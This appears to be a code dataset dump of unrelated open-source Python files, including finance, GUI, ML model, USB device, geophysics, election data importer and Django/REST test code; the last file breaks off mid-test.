id
stringlengths
3
8
content
stringlengths
100
981k
11588144
import yfinance as yf class FYahoo: def __init__(self): self.tickers = {} def open_ticker(self, ticker :str): if ticker in self.get_avalable_tickers(): return True else: try: self.tickers.update({ ticker: yf.Ticker(ticker) }) return True except Exception as e: print(e.with_traceback(e)) return False def get_history(self, ticker :str, period :str = "max"): if ticker in self.get_avalable_tickers(): return self.tickers[ticker].history(period=period) else: print("please open ticker first call 'open_ticker(*args)' ") return False def get_avalable_tickers(self): return list(self.tickers.keys()) if __name__ == "__main__": ticker = "BTC-USD" fy = FYahoo() fy.open_ticker(ticker) hist = fy.get_history(ticker, period="max") # 1mo, 1wk, 1m, 1d, max etc. print(hist, type(hist)) print(f"last close: {hist['Close'][-1]}")
11588219
from i3pystatus import IntervalModule import psutil import getpass class MakeWatch(IntervalModule): """ Watches for make jobs and notifies when they are completed. requires: psutil """ settings = ( ("name", "Listen for a job other than 'make' jobs"), ("running_color", "Text color while the job is running"), ("idle_color", "Text color while the job is not running"), "format", ) running_color = "#FF0000" # red idle_color = "#00FF00" # green name = 'make' format = "{name}: {status}" def run(self): status = 'idle' for proc in psutil.process_iter(): cur_proc = proc.as_dict(attrs=['name', 'username']) if getpass.getuser() in cur_proc['username']: if cur_proc['name'] == self.name: status = proc.as_dict(attrs=['status'])['status'] if status == 'idle': color = self.idle_color else: color = self.running_color cdict = { "name": self.name, "status": status } self.data = cdict self.output = { "full_text": self.format.format(**cdict), "color": color }
11588230
from NodeGraphQt import BaseNode, QtCore class IfNode(BaseNode): """ if node. """ __identifier__ = 'Logics' NODE_NAME = 'If' def __init__(self): super(IfNode, self).__init__() self.condition = self.add_input('condition') self._then = self.add_input('then') self._else = self.add_input('else') self.add_output('out') self.create_property('out', None) def run(self): for port in self.condition.connected_ports(): port.node().run() if port.node().get_property(port.name()): result = self._then else: result = self._else for port in result.connected_ports(): port.node().run() self.set_property('out', port.node().get_property(port.name())) break def on_input_connected(self, to_port, from_port): """Override node callback method.""" from_port.node().run() self.set_property(to_port.name(), from_port.node().get_property(from_port.name())) self.update_stream() def on_input_disconnected(self, to_port, from_port): """Override node callback method.""" self.set_property('out', None) class BooleanNode(BaseNode): """ Boolean Logic funtions node. """ __identifier__ = 'Logics' NODE_NAME = 'Boolean' logics = {'and': 'a and b', 'or': 'a or b', 'xor': '(not a and b) or (a and not b)', 'not': 'not a'} def __init__(self): super(BooleanNode, self).__init__() self.a = self.add_input('a') self.b = self.add_input('b') self.add_output('out') self.create_property('out', None) self.add_combo_menu('funcs', 'Functions', items=list(self.logics.keys()), tab='widgets') self.func = self.logics['and'] # switch math function type self.view.widgets['funcs'].value_changed.connect(self.addFunction) self.view.widgets['funcs'].value_changed.connect(self.update_stream) def addFunction(self, prop, func): """ Create inputs based on math functions arguments. """ self.func = self.logics[func] if self.b.visible() and not 'b' in self.func: self.b.set_visible(False) elif not self.b.visible(): self.b.set_visible(True) def run(self): a = None b = None for port in self.a.connected_ports(): port.node().run() a = port.node().get_property(port.name()) for port in self.b.connected_ports(): port.node().run() b = port.node().get_property(port.name()) if a is None or (b is None and 'b' in self.func): raise Exception("No inputs!") self.set_property('out', eval(self.func)) def on_input_connected(self, to_port, from_port): """Override node callback method.""" from_port.node().run() result = from_port.node().get_property(from_port.name()) self.set_property(to_port.name(), result) self.update_stream() def on_input_disconnected(self, to_port, from_port): """Override node callback method.""" self.set_property('out', None)
11588271
import torch import torch.nn as nn import math import cv2 import torch.nn.functional as F class VGG16(nn.Module): def __init__(self, args): super(VGG16, self).__init__() self.stage = args.stage self.conv1_1 = nn.Conv2d(4, 64, kernel_size=3,stride = 1, padding=1,bias=True) self.conv1_2 = nn.Conv2d(64, 64, kernel_size=3,stride = 1, padding=1,bias=True) self.conv2_1 = nn.Conv2d(64, 128, kernel_size=3, padding=1,bias=True) self.conv2_2 = nn.Conv2d(128, 128, kernel_size=3, padding=1,bias=True) self.conv3_1 = nn.Conv2d(128, 256, kernel_size=3, padding=1,bias=True) self.conv3_2 = nn.Conv2d(256, 256, kernel_size=3, padding=1,bias=True) self.conv3_3 = nn.Conv2d(256, 256, kernel_size=3, padding=1,bias=True) self.conv4_1 = nn.Conv2d(256, 512, kernel_size=3, padding=1,bias=True) self.conv4_2 = nn.Conv2d(512, 512, kernel_size=3, padding=1,bias=True) self.conv4_3 = nn.Conv2d(512, 512, kernel_size=3, padding=1,bias=True) self.conv5_1 = nn.Conv2d(512, 512, kernel_size=3, padding=1,bias=True) self.conv5_2 = nn.Conv2d(512, 512, kernel_size=3, padding=1,bias=True) self.conv5_3 = nn.Conv2d(512, 512, kernel_size=3, padding=1,bias=True) # model released before 2019.09.09 should use kernel_size=1 & padding=0 #self.conv6_1 = nn.Conv2d(512, 512, kernel_size=1, padding=0,bias=True) self.conv6_1 = nn.Conv2d(512, 512, kernel_size=3, padding=1,bias=True) self.deconv6_1 = nn.Conv2d(512, 512, kernel_size=1,bias=True) self.deconv5_1 = nn.Conv2d(512, 512, kernel_size=5, padding=2,bias=True) self.deconv4_1 = nn.Conv2d(512, 256, kernel_size=5, padding=2,bias=True) self.deconv3_1 = nn.Conv2d(256, 128, kernel_size=5, padding=2,bias=True) self.deconv2_1 = nn.Conv2d(128, 64, kernel_size=5, padding=2,bias=True) self.deconv1_1 = nn.Conv2d(64, 64, kernel_size=5, padding=2,bias=True) self.deconv1 = nn.Conv2d(64, 1, kernel_size=5, padding=2,bias=True) if args.stage == 2: # for stage2 training for p in self.parameters(): p.requires_grad=False if self.stage == 2 or self.stage == 3: self.refine_conv1 = nn.Conv2d(4, 64, kernel_size=3, padding=1, bias=True) self.refine_conv2 = nn.Conv2d(64, 64, kernel_size=3, padding=1, bias=True) self.refine_conv3 = nn.Conv2d(64, 64, kernel_size=3, padding=1, bias=True) self.refine_pred = nn.Conv2d(64, 1, kernel_size=3, padding=1, bias=True) def forward(self, x): # Stage 1 x11 = F.relu(self.conv1_1(x)) x12 = F.relu(self.conv1_2(x11)) x1p, id1 = F.max_pool2d(x12,kernel_size=(2,2), stride=(2,2),return_indices=True) # Stage 2 x21 = F.relu(self.conv2_1(x1p)) x22 = F.relu(self.conv2_2(x21)) x2p, id2 = F.max_pool2d(x22,kernel_size=(2,2), stride=(2,2),return_indices=True) # Stage 3 x31 = F.relu(self.conv3_1(x2p)) x32 = F.relu(self.conv3_2(x31)) x33 = F.relu(self.conv3_3(x32)) x3p, id3 = F.max_pool2d(x33,kernel_size=(2,2), stride=(2,2),return_indices=True) # Stage 4 x41 = F.relu(self.conv4_1(x3p)) x42 = F.relu(self.conv4_2(x41)) x43 = F.relu(self.conv4_3(x42)) x4p, id4 = F.max_pool2d(x43,kernel_size=(2,2), stride=(2,2),return_indices=True) # Stage 5 x51 = F.relu(self.conv5_1(x4p)) x52 = F.relu(self.conv5_2(x51)) x53 = F.relu(self.conv5_3(x52)) x5p, id5 = F.max_pool2d(x53,kernel_size=(2,2), stride=(2,2),return_indices=True) # Stage 6 x61 = F.relu(self.conv6_1(x5p)) # Stage 6d x61d = F.relu(self.deconv6_1(x61)) # Stage 5d x5d = F.max_unpool2d(x61d,id5, kernel_size=2, stride=2) x51d = F.relu(self.deconv5_1(x5d)) # Stage 4d x4d = F.max_unpool2d(x51d, id4, kernel_size=2, stride=2) x41d = F.relu(self.deconv4_1(x4d)) # Stage 3d x3d = F.max_unpool2d(x41d, id3, kernel_size=2, stride=2) x31d = F.relu(self.deconv3_1(x3d)) # Stage 2d x2d = F.max_unpool2d(x31d, id2, kernel_size=2, stride=2) x21d = F.relu(self.deconv2_1(x2d)) # Stage 1d x1d = F.max_unpool2d(x21d, id1, kernel_size=2, stride=2) x12d = F.relu(self.deconv1_1(x1d)) # Should add sigmoid? github repo add so. raw_alpha = self.deconv1(x12d) pred_mattes = F.sigmoid(raw_alpha) if self.stage <= 1: return pred_mattes, 0 # Stage2 refine conv1 refine0 = torch.cat((x[:, :3, :, :], pred_mattes), 1) refine1 = F.relu(self.refine_conv1(refine0)) refine2 = F.relu(self.refine_conv2(refine1)) refine3 = F.relu(self.refine_conv3(refine2)) # Should add sigmoid? # sigmoid lead to refine result all converge to 0... #pred_refine = F.sigmoid(self.refine_pred(refine3)) pred_refine = self.refine_pred(refine3) pred_alpha = F.sigmoid(raw_alpha + pred_refine) #print(pred_mattes.mean(), pred_alpha.mean(), pred_refine.sum()) return pred_mattes, pred_alpha
11588291
import collections import os from skyline.tracking.base import ReportBase, ReportBuilderBase import skyline.tracking.time.report_queries as queries RunTimeEntry = collections.namedtuple( 'RunTimeEntry', ['operation_name', 'forward_ms', 'backward_ms', 'file_path', 'line_number'], ) class OperationRunTimeReport(ReportBase): def __init__(self, connection): super().__init__(connection) def get_run_time_entries(self, path_prefix=None): cursor = self._connection.cursor() return map( lambda row: RunTimeEntry(*row), cursor.execute(queries.get_run_time_entries_with_context), ) class OperationRunTimeReportBuilder(ReportBuilderBase): # This is the operation run time tracking report file format version that # will be created by this builder. When changes are made to the file # format, this integer should be increased monotonically. # # We need to version these tracking reports to protect us from future # changes to the file format. Version = 1 def __init__(self, file=None): super().__init__(file) def add_run_time_entry( self, operation_name, forward_ms, backward_ms, stack_context): cursor = self._connection.cursor() cursor.execute(queries.add_run_time_entry, ( operation_name, forward_ms, backward_ms, )) entry_id = cursor.lastrowid def stack_frame_generator(): for idx, frame in enumerate(stack_context.frames): yield (idx, frame.file_path, frame.line_number, entry_id) cursor.executemany(queries.add_stack_frame, stack_frame_generator()) def build(self): self._connection.commit() return OperationRunTimeReport(self._connection) def _create_report_tables(self): cursor = self._connection.cursor() cursor.execute(queries.set_report_format_version.format( version=OperationRunTimeReportBuilder.Version)) for creation_query in queries.create_report_tables.values(): cursor.execute(creation_query) self._connection.commit()
11588301
import copy from abc import ABCMeta, abstractmethod import torch class BaseMeter(object, metaclass=ABCMeta): """ Interface for all meters. All meters should subclass this class """ @abstractmethod def measure(self, *batchs): """ Partial calculation of the metric for the given batches """ pass @abstractmethod def reset(self): """ Resets the metric value """ pass @abstractmethod def value(self): """ Returns the metric final value """ pass def clone(self): """ Create a new instance copied from this instance """ return copy.deepcopy(self) def eval_model_on_dl(self, model, dl): """ Evaluates the model on a given DataLoader Arguments: model (nn.Module): Module to run the metric against dl (DataLoader): Input DataLoader """ is_cuda = next(model.parameters()).is_cuda self.reset() with torch.no_grad(): model.eval() for x, y_hat in dl: if is_cuda: x = x.cuda() y_hat = y_hat.cuda() self.measure(model(x.cuda()), y_hat.cuda()) return self.value() def __repr__(self): return "{}()".format(self.__class__.__name__)
11588309
from __future__ import absolute_import from django.core.urlresolvers import reverse from sentry.models import Broadcast, BroadcastSeen from sentry.testutils import APITestCase class BroadcastListTest(APITestCase): def test_simple(self): broadcast1 = Broadcast.objects.create(message='bar', is_active=True) Broadcast.objects.create(message='foo', is_active=False) self.login_as(user=self.user) url = reverse('sentry-api-0-broadcast-index') response = self.client.get(url) assert response.status_code == 200 assert len(response.data) == 1 assert response.data[0]['id'] == str(broadcast1.id) class BroadcastUpdateTest(APITestCase): def test_simple(self): broadcast1 = Broadcast.objects.create(message='bar', is_active=True) broadcast2 = Broadcast.objects.create(message='foo', is_active=False) self.login_as(user=self.user) url = reverse('sentry-api-0-broadcast-index') response = self.client.put(url, { 'hasSeen': '1' }) assert response.status_code == 200 assert response.data['hasSeen'] assert BroadcastSeen.objects.filter( user=self.user, broadcast=broadcast1, ).exists() assert not BroadcastSeen.objects.filter( user=self.user, broadcast=broadcast2, ).exists()
11588325
import pbge import pygame from pbge.randmaps.decor import OmniDec from pbge.randmaps.rooms import FuzzyRoom, OpenRoom from . import ghterrain import random class MSWreckageDecor(OmniDec): FLOOR_DECOR = (ghterrain.MSWreckage,) FLOOR_FILL_FACTOR = 0.15 class DragonToothDecor(OmniDec): FLOOR_DECOR = (ghterrain.DragonTeethWall,ghterrain.DragonTeethWall,ghterrain.Forest) FLOOR_FILL_FACTOR = 0.25 class ForestRoom(FuzzyRoom): def build( self, gb, archi ): super().build(gb,archi) # Add some random forest blobs. if self.area.width > 4 and self.area.height > 4: for t in range(random.randint(3,10)): x = random.randint(self.area.left+1,self.area.right-2) y = random.randint(self.area.top+1,self.area.bottom-2) gb.fill(pygame.Rect(x-1,y-1,3,3),wall=ghterrain.Forest) else: mydest = pygame.Rect(0,0,3,3) mydest.center = self.area.center gb.fill(mydest,wall=ghterrain.Forest) class LakeRoom(FuzzyRoom): def build( self, gb, archi ): super().build(gb,archi) # Add some random forest blobs. if self.area.width > 8 and self.area.height > 8: for t in range(random.randint(1,3)): x = random.randint(self.area.left+3,self.area.right-4) y = random.randint(self.area.top+3,self.area.bottom-4) s = random.randint(3,5) gb.fill_blob(pygame.Rect(x-1,y-1,s,s),floor=ghterrain.Water) else: mydest = pygame.Rect(0,0,3,3) mydest.center = self.area.center gb.fill(mydest,floor=ghterrain.Water) class WreckageRoom(FuzzyRoom): DECORATE = MSWreckageDecor(floor_fill_factor=0.2) class DragonToothRoom(FuzzyRoom): DECORATE = DragonToothDecor() class MSRuinsRoom(FuzzyRoom): DECORATE = MSWreckageDecor(floor_fill_factor=0.05) def build(self, gb, archi): super().build(gb, archi) # Add some random ruins. ruin_list = list() safe_area = self.area.inflate(-4,-4) if safe_area.width > 8 and safe_area.height > 8: for t in range(random.randint(3,8)): x = random.randint(self.area.left+3,self.area.right-4) y = random.randint(self.area.top+3,self.area.bottom-4) myroomdest = pygame.Rect(0,0,random.randint(2,4),random.randint(2,4)) myroomdest.center = (x,y) myroomdest = myroomdest.clamp(safe_area) if myroomdest.inflate(2,2).collidelist(ruin_list) == -1: gb.fill(myroomdest,wall=ghterrain.MSRuinedWall) ruin_list.append(myroomdest) else: mydest = pygame.Rect(0, 0, 3, 3) mydest.center = self.area.center gb.fill(mydest, wall=ghterrain.MSRuinedWall) class BarArea(OpenRoom): def build(self, gb, archi): super().build(gb, archi) # Add a bar along the south and maybe along one side. mydest = pygame.Rect(self.area.left, self.area.bottom-1, self.area.width, 1) gb.fill(mydest, wall=ghterrain.BarTerrain) if random.randint(1,3) == 1: mydest = pygame.Rect(self.area.left, self.area.top, 1, self.area.height) gb.fill(mydest, wall=ghterrain.BarTerrain) elif random.randint(1,2) == 1: mydest = pygame.Rect(self.area.right, self.area.top, 1, self.area.height) gb.fill(mydest, wall=ghterrain.BarTerrain)
11588350
from abc import ABC, abstractmethod from time import sleep, time from typing import Optional from usb.control import get_status from usb.core import Device as USBDevice from usb.core import USBError, find from usb.legacy import (CLASS_DATA, CLASS_VENDOR_SPEC, ENDPOINT_IN, ENDPOINT_OUT, ENDPOINT_TYPE_BULK) from usb.util import endpoint_direction, endpoint_type, find_descriptor class Protocol(ABC): @abstractmethod def __init__(self, vendor: int, product: int, timeout: Optional[float] = 5) -> None: ... @abstractmethod def write(self, data: bytes, timeout: Optional[float] = 5) -> None: ... @abstractmethod def read(self, size: int = 0x4000, timeout: Optional[float] = 5) -> bytes: ... @abstractmethod def disconnect(self, timeout: Optional[float] = 5) -> None: ... class USBProtocol(Protocol): def __init__(self, vendor: int, product: int, timeout: Optional[float] = 5) -> None: super().__init__(vendor, product, timeout) if timeout is not None: timeout += time() while True: device = find(idVendor=vendor, idProduct=product) if device is not None: try: get_status(device) break except USBError as error: if (error.backend_error_code != -1 and error.backend_error_code != -4): raise error if timeout is not None and time() > timeout: if device is None: raise TimeoutError("Device not found", -5, 19) raise TimeoutError("Invalid device state", -12, 131) sleep(0.01) self.device: USBDevice = device print(f"Found Goodix device: \"{self.device.product}\" " f"from \"{self.device.manufacturer}\" " f"on bus {self.device.bus} " f"address {self.device.address}.") interface_data = find_descriptor( self.device.get_active_configuration(), custom_match=lambda interface: interface.bInterfaceClass == CLASS_DATA or interface.bInterfaceClass == CLASS_VENDOR_SPEC) if interface_data is None: raise ConnectionError("Interface data not found", -5, 6) print(f"Found interface data: {interface_data.bInterfaceNumber}") endpoint_in = find_descriptor( interface_data, custom_match=lambda endpoint: endpoint_direction( endpoint.bEndpointAddress) == ENDPOINT_IN and endpoint_type( endpoint.bmAttributes) == ENDPOINT_TYPE_BULK) if endpoint_in is None: raise ConnectionError("Endpoint in not found", -5, 6) self.endpoint_in: int = endpoint_in.bEndpointAddress print(f"Found endpoint in: {hex(self.endpoint_in)}") endpoint_out = find_descriptor( interface_data, custom_match=lambda endpoint: endpoint_direction( endpoint.bEndpointAddress) == ENDPOINT_OUT and endpoint_type( endpoint.bmAttributes) == ENDPOINT_TYPE_BULK) if endpoint_out is None: raise ConnectionError("Endpoint out not found", -5, 6) self.endpoint_out: int = endpoint_out.bEndpointAddress print(f"Found endpoint out: {hex(self.endpoint_out)}") if self.device.is_kernel_driver_active(interface_data.bInterfaceNumber): self.device.detach_kernel_driver(interface_data.bInterfaceNumber) self.device.set_configuration() def write(self, data: bytes, timeout: Optional[float] = 5) -> None: timeout = 0 if timeout is None else round(timeout * 1000) length = len(data) if length % 0x40: data += b"\x00" * (0x40 - length % 0x40) for i in range(0, length, 0x40): self.device.write(self.endpoint_out, data[i:i + 0x40], timeout) def read(self, size: int = 0x10000, timeout: Optional[float] = 5) -> bytes: timeout = 0 if timeout is None else round(timeout * 1000) return self.device.read(self.endpoint_in, size, timeout).tobytes() def disconnect(self, timeout: Optional[float] = 5) -> None: if timeout is not None: timeout += time() while True: try: get_status(self.device) except USBError as error: if (error.backend_error_code == -1 or error.backend_error_code == -4): break raise error if timeout is not None and time() > timeout: raise TimeoutError("Device is still connected", -7, 110) sleep(0.01)
11588359
class FactoryInterface: def add_part(self, part: str): parts = self._get_default_parts() if part in parts.keys(): return parts[part] return None def _get_default_parts(self): raise NotImplementedError() class GenericFactory(FactoryInterface): def _get_default_parts(self): return { 'llantas': GenericTires(), 'manillar': GenericHandlebar() } class MountainFactory(FactoryInterface): def _get_default_parts(self): return { 'llantas': RuggedTires(), 'manillar': HardHandlebar() } class RoadFactory(FactoryInterface): def _get_default_parts(self): return { 'llantas': RoadTires(), 'manillar': SportHandlebar() } class GenericTires: def part_type(self): return 'llantas genéricas' class RuggedTires: def part_type(self): return 'llantas 4x4' class RoadTires: def part_type(self): return 'llantas para carretera' class GenericHandlebar: def part_type(self): return 'manillar genérico' class HardHandlebar: def part_type(self): return 'manillar rígido' class SportHandlebar: def part_type(self): return 'manillar deportivo' class Bicycle: def __init__(self, factory: FactoryInterface = GenericFactory): self.type = self.get_type() self.llantas = factory().add_part('llantas') self.manillar = factory().add_part('manillar') def get_type(self): return f"Bicicleta" def parts(self): return [self.llantas.part_type(), self.manillar.part_type()]
11588369
r""" DC apparent resistivity ======================= DC apparent resistivity, dipole-dipole configuration. There are various DC sounding layouts, the most common ones being Schlumberger, Wenner, pole-pole, pole-dipole, and **dipole-dipole**, at which we have a look here. Dipole-dipole layout as shown in figure 8.32 in Kearey et al. (2002): .. image:: ../../_static/figures/Fig_from_8-32.jpg The apparent resistivity :math:`\rho_a` of the *plotting point* is then computed with .. math:: \rho_a = \frac{V}{I} \pi na(n+1)(n+2)\ , where :math:`V` is measured Voltage, :math:`I` is source strength, :math:`a` is dipole length, and :math:`n` is the factor of source-receiver separation. **References** **<NAME>., <NAME>, and <NAME>, 2002**, An introduction to geophysical exploration, 3rd ed.: Blackwell Scientific Publications, ISBN: 0 632 04929 4. """ import empymod import numpy as np import matplotlib.pyplot as plt plt.style.use('ggplot') ############################################################################### # Compute :math:`\boldsymbol{\rho_a}` # ----------------------------------- # # First we define a function to compute apparent resistivity for a given model # and given source and receivers. def comp_appres(depth, res, a, n, srcpts=1, recpts=1, verb=1): """Return apparent resistivity for dipole-dipole DC measurement rho_a = V/I pi a n (n+1) (n+2). Returns die apparent resistivity due to: - Electric source, inline (y = 0 m). - Source of 1 A strength. - Source and receiver are located at the air-interface. - Source is centered at x = 0 m. Note: DC response can be obtained by either t->infinity s or f->0 Hz. f = 0 Hz is much faster, as there is no Fourier transform involved and only a single frequency has to be computed. By default, the minimum frequency in empymod is 1e-20 Hz. The difference between the signals for 1e-20 Hz and 0 Hz is very small. For more explanation regarding input parameters see `empymod.model`. Parameters ---------- depth : Absolute depths of layer interfaces, without air-interface. res : Resistivities of the layers, one more than depths (lower HS). a : Dipole length. n : Separation factors. srcpts, recpts : If < 3, bipoles are approximated as dipoles. verb : Verbosity. Returns ------- rho_a : Apparent resistivity. AB2 : Src/rec-midpoints """ # Get offsets between src-midpoint and rec-midpoint, AB AB = (n+1)*a # Collect model, putting source and receiver slightly (1e-3 m) into the # ground. model = { 'src': [-a/2, a/2, 0, 0, 1e-3, 1e-3], 'rec': [AB-a/2, AB+a/2, AB*0, AB*0, 1e-3, 1e-3], 'depth': np.r_[0, np.array(depth, ndmin=1)], 'freqtime': 1e-20, # Smaller f would be set to 1e-20 be empymod. 'verb': verb, # Setting it to 1e-20 avoids warning-message. 'res': np.r_[2e14, np.array(res, ndmin=1)], 'strength': 1, # So it is NOT normalized to 1 m src/rec. 'htarg': {'pts_per_dec': -1}, } return np.real(empymod.bipole(**model))*np.pi*a*n*(n+1)*(n+2), AB/2 ############################################################################### # Plot-function # ------------- # # Second we create a plot-function, which includes the call to `comp_appres`, # to use for a couple of different models. def plotit(depth, a, n, res1, res2, res3, title): """Call `comp_appres` and plot result.""" # Compute the three different models rho1, AB2 = comp_appres(depth, res1, a, n) rho2, _ = comp_appres(depth, res2, a, n) rho3, _ = comp_appres(depth, res3, a, n) # Create figure plt.figure() # Plot curves plt.loglog(AB2, rho1, label='Case 1') plt.plot(AB2, rho2, label='Case 2') plt.plot(AB2, rho3, label='Case 3') # Legend, labels plt.legend(loc='best') plt.title(title) plt.xlabel('AB/2 (m)') plt.ylabel(r'Apparent resistivity $\rho_a (\Omega\,$m)') plt.show() ############################################################################### # Model 1: 2 layers # ~~~~~~~~~~~~~~~~~ # # +--------+---------------------+---------------------+ # |layer | depth (m) | resistivity (Ohm m) | # +========+=====================+=====================+ # |air | :math:`-\infty` - 0 | 2e14 | # +--------+---------------------+---------------------+ # |layer 1 | 0 - 50 | 10 | # +--------+---------------------+---------------------+ # |layer 2 | 50 - :math:`\infty` | 100 / 10 / 1 | # +--------+---------------------+---------------------+ plotit( 50, # Depth 20, # a (src- and rec-lengths) np.arange(3, 500), # n [10, 100], # Case 1 [10, 10], # Case 2 [10, 1], # Case 3 'Model 1: 2 layers') ############################################################################### # Model 2: layer embedded in background # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # +--------+----------------------+---------------------+ # |layer | depth (m) | resistivity (Ohm m) | # +========+======================+=====================+ # |air | :math:`-\infty` - 0 | 2e14 | # +--------+----------------------+---------------------+ # |layer 1 | 0 - 50 | 10 | # +--------+----------------------+---------------------+ # |layer 2 | 50 - 500 | 100 / 10 / 1 | # +--------+----------------------+---------------------+ # |layer 3 | 500 - :math:`\infty` | 10 | # +--------+----------------------+---------------------+ plotit( [50, 500], # Depth 20, # a (src- and rec-lengths) np.arange(3, 500), # n [10, 100, 10], # Case 1 [10, 10, 10], # Case 2 [10, 1, 10], # Case 3 'Model 2: layer embedded in background') ############################################################################### # Model 3: 3 layers # ~~~~~~~~~~~~~~~~~ # # +--------+----------------------+----------------------+ # |layer | depth (m) | resistivity (Ohm m) | # +========+======================+======================+ # |air | :math:`-\infty` - 0 | 2e14 | # +--------+----------------------+----------------------+ # |layer 1 | 0 - 50 | 10 | # +--------+----------------------+----------------------+ # |layer 2 | 50 - 500 | 100 / 10 / 1 | # +--------+----------------------+----------------------+ # |layer 3 | 500 - :math:`\infty` | 1000 / 10 / 0.1 | # +--------+---------------------+-----------------------+ plotit( [50, 500], # Depth 20, # a (src- and rec-lengths) np.arange(3, 500), # n [10, 100, 1000], # Case 1 [10, 10, 10], # Case 2 [10, 1, 0.1], # Case 3 'Model 3: 3 layers') ############################################################################### empymod.Report()
11588380
from data_importers.management.commands import BaseHalaroseCsvImporter class Command(BaseHalaroseCsvImporter): council_id = "WSM" addresses_name = "2021-03-30T13:02:54.918672/polling_station_export-2021-03-30.csv" stations_name = "2021-03-30T13:02:54.918672/polling_station_export-2021-03-30.csv" elections = ["2021-05-06"] # Have checked "Mornington Hotel 12 Lancaster Gate" and # "York Room, Lancaster Hall Hotel 35 Craven Terrace" closeness; all good. # These all have wrong locations in AddressBase, but have the right station # for their actual location. # "10033552804", # Flat 3, 2 Moreton Close # "100022803552", # 9 ST.BARNABAS STREET, LONDON # "100022749688", # 50 ELNATHAN MEWS, LONDON def replace_station_96(self, record): # https://trello.com/c/HpRDeeyv/401-westminster if record.pollingstationnumber == "96": record = record._replace( pollingstationaddress_1="Cumberland Street", pollingstationaddress_2="London", pollingstationaddress_3="", pollingstationaddress_4="", pollingstationaddress_5="", pollingstationname="Holy Apostles Church Hall", pollingstationpostcode="SW1V 4LY", ) return record def station_record_to_dict(self, record): record = self.replace_station_96(record) return super().station_record_to_dict(record) def address_record_to_dict(self, record): # This has to be here too, so the station ID is calculated correctly from the # name. record = self.replace_station_96(record) rec = super().address_record_to_dict(record) uprn = record.uprn.strip().lstrip("0") if record.housepostcode in [ "NW8 9LJ", "W1U 8BD", "W2 5HA", "SW1P 4JZ", "NW8 8LH", "W2 2QN", "W9 3DW", "W9 2AL", "W9 1SF", "W10 4PR", ]: return None # split # Carried-over postcode fixes if record.houseid == "10010095": # W9 1DL rec["postcode"] = "W9 2DL" if uprn == "100022801294": rec["postcode"] = "W1J 7JJ" if uprn == "100023474073": rec["postcode"] = "W1J 6HL" if uprn == "10033565232": rec["postcode"] = "SW7 5HF" if uprn == "10033561131": rec["postcode"] = "SW1P 4SA" return rec
11588388
import json import unittest from django.db import connection, models from rest_framework import status from rest_framework.reverse import reverse from mayan.apps.acls.classes import ModelPermission from mayan.apps.rest_api.api_view_mixins import ExternalObjectAPIViewMixin from mayan.apps.testing.tests.base import GenericViewTestCase from .. import generics, serializers from .base import BaseAPITestCase from .literals import TEST_OBJECT_LABEL, TEST_OBJECT_LABEL_EDITED from .mixins import DynamicFieldSerializerAPIViewTestCaseMixin, RESTAPIViewTestMixin class RESTAPIViewTestCase(RESTAPIViewTestMixin, GenericViewTestCase): def test_browser_api_view(self): response = self._request_test_browser_api_view() self.assertEqual(response.status_code, 200) @unittest.skipIf(connection.vendor != 'sqlite', 'Skip for known Django issues #15802 and #27074') def test_redoc_ui_view(self): response = self._request_test_redoc_ui_view() self.assertEqual(response.status_code, 200) @unittest.skipIf(connection.vendor != 'sqlite', 'Skip for known Django issues #15802 and #27074') def test_swagger_ui_view(self): response = self._request_test_swagger_ui_view() self.assertEqual(response.status_code, 200) def test_swagger_no_ui_json_view(self): self.expected_content_types = ('application/json; charset=utf-8',) response = self._request_test_swagger_no_ui_json_view() self.assertEqual(response.status_code, 200) def test_swagger_no_ui_yaml_view(self): self.expected_content_types = ('application/yaml; charset=utf-8',) response = self._request_test_swagger_no_ui_yaml_view() self.assertEqual(response.status_code, 200) class BatchAPIRequestViewTestCase(BaseAPITestCase): def setUp(self): super().setUp() self._create_test_permission() self.TestModel = self._create_test_model( fields={ 'label': models.CharField(max_length=32, unique=True) } ) ModelPermission.register( model=self.TestModel, permissions=( self.test_permission, ) ) self._create_test_object( instance_kwargs={ 'label': TEST_OBJECT_LABEL } ) class TestModelSerializer(serializers.ModelSerializer): class Meta: fields = ('id', 'label') model = self.TestModel def _test_view_factory(): class TestView(generics.ListCreateAPIView): mayan_object_permissions = { 'GET': (self.test_permission,) } mayan_view_permissions = { 'POST': (self.test_permission,) } queryset = self.TestModel.objects.all() serializer_class = TestModelSerializer return TestView.as_view() self.add_test_view( test_object=self.test_object, test_view_factory=_test_view_factory, test_view_url=r'^test-view-url/$' ) self._test_model_list_api_view_name = self._test_view_name def _test_view_factory(): TestModel = self.TestModel class TestView(generics.RetrieveUpdateDestroyAPIView): lookup_url_kwarg = 'test_object_id' mayan_object_permissions = { 'DELETE': (self.test_permission,), 'GET': (self.test_permission,), 'PATCH': (self.test_permission,), 'PUT': (self.test_permission,) } queryset = TestModel.objects.all() serializer_class = TestModelSerializer return TestView.as_view() self.add_test_view( test_object=self.test_object, test_view_factory=_test_view_factory, test_view_url=r'^test-view-url/(?P<test_object_id>\d+)/$' ) self._test_model_detail_api_view_name = self._test_view_name def _request_batch_api_request_api_view(self, requests): return self.post( viewname='rest_api:batchrequest-create', data={ 'requests': requests } ) def test_create_batch_api_request(self): self.grant_permission(permission=self.test_permission) requests = [ { 'body': {'label': TEST_OBJECT_LABEL}, 'method': 'POST', 'name': 'test_request', 'url': reverse( viewname='rest_api:{}'.format( self._test_model_list_api_view_name ) ) } ] self.test_object.delete() test_model_count = self.TestModel.objects.count() self._clear_events() response = self._request_batch_api_request_api_view( requests=json.dumps(obj=requests) ) self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['count'], 1) self.assertEqual( response.data['results'][0]['status_code'], status.HTTP_201_CREATED ) self.assertEqual( self.TestModel.objects.count(), test_model_count + 1 ) events = self._get_test_events() self.assertEqual(events.count(), 0) def test_delete_batch_api_request(self): self.grant_access( obj=self.test_object, permission=self.test_permission ) requests = [ { 'method': 'DELETE', 'name': 'test_request', 'url': reverse( viewname='rest_api:{}'.format( self._test_model_detail_api_view_name ), kwargs={'test_object_id': self.test_object.pk} ) } ] test_model_count = self.TestModel.objects.count() self._clear_events() response = self._request_batch_api_request_api_view( requests=json.dumps(obj=requests) ) self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['count'], 1) self.assertEqual( response.data['results'][0]['status_code'], status.HTTP_204_NO_CONTENT ) self.assertEqual( self.TestModel.objects.count(), test_model_count - 1 ) events = self._get_test_events() self.assertEqual(events.count(), 0) def test_edit_via_patch_batch_api_request(self): self.grant_access( obj=self.test_object, permission=self.test_permission ) requests = [ { 'body': {'label': 